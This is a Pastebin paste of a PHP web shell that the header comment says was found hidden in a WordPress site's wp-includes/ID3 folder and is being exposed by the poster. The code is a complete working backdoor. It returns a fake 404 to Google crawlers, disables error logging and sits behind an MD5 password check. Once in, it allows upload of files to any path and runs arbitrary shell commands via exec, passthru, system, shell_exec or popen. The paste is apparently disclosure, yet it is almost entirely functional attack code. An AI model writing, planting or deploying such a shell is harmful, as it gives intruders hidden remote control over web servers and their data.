SHARE
TWEET

getid3s.php

a guest Sep 20th, 2019 85 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.  * /wp-includes/ID3/getid3s.php SHELL
  4.  * They hide it in the ID3 core plugin
  5.  * unknown author and deployer - auth_pass MD5 doesn't change (redacted here)
  6.  * exposed by @dave_daves
  7.  */
  8.  
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10.     header('HTTP/1.0 404 Not Found');
  11.     exit;
  12. }
  13. $auth_pass = "•••••••••••••••••••••••••••••"; //md5
  14. @session_start();
  15. @error_reporting(0);
  16. @ini_set('error_log',NULL);
  17. @ini_set('log_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @set_time_limit(0);
  20. @set_magic_quotes_runtime(0);
  21. function printLogin() {
  22.     ?>
  23.     <center>
  24.     <form method=post>
  25.     Password: <input type=password name=pass><input type=submit value='>>'>
  26.     </form></center>
  27.     <?php
  28.     exit;
  29. }
  30. function Ssetcookie($k, $v) {
  31.     $_COOKIE[$k] = $v;
  32.     setcookie($k, $v);
  33. }
  34.  
  35. if(!empty($auth_pass)) {
  36.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  37.         Ssetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  38.  
  39.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  40.         printLogin();
  41. }
  42.  
  43. if(isset($_GET['v'])) {
  44.     $action = trim($_GET['v']);
  45.     switch($action) {
  46.         case 'fuck':
  47.             echo '<b>'.php_uname().'</b><br>';
  48.             echo '<form action="" method="post" enctype="multipart/form-data" name="fuck" id="fuck">';
  49.             echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
  50.             echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  51.             if( $_POST['_upl'] == "Upload" ) {
  52.                 if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
  53.                 else echo '<b>Upload failed!</b>';
  54.             }
  55.             break;
  56.         case 'exec':
  57.             if(isset($_GET['cmd'])) {
  58.                 $cmd = $_GET['cmd'];
  59.                 echo '<pre>';
  60.                 echo ex($cmd);
  61.                 echo '</pre>';
  62.             } else die('No command to be executed!');
  63.             break;
  64.         default:
  65.             header("HTTP/1.0 404 Not Found");
  66.             break;
  67.     }
  68. } else header("HTTP/1.0 404 Not Found");
  69.  
  70. function ex($in) {
  71.     $out = '';
  72.     if(function_exists('exec')) {
  73.         @exec($in,$out);
  74.         $out = @join("\n",$out);
  75.     }elseif(function_exists('passthru')) {
  76.         ob_start();
  77.         @passthru($in);
  78.         $out = ob_get_clean();
  79.     }elseif(function_exists('system')) {
  80.         ob_start();
  81.         @system($in);
  82.         $out = ob_get_clean();
  83.     }elseif(function_exists('shell_exec')) $out = shell_exec($in);
  84.     elseif(is_resource($f = @popen($in,"r"))) {
  85.         $out = "";
  86.         while(!@feof($f))
  87.             $out .= fread($f,1024);
  88.         pclose($f);
  89.     }
  90.     return $out;
  91. }
  92. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top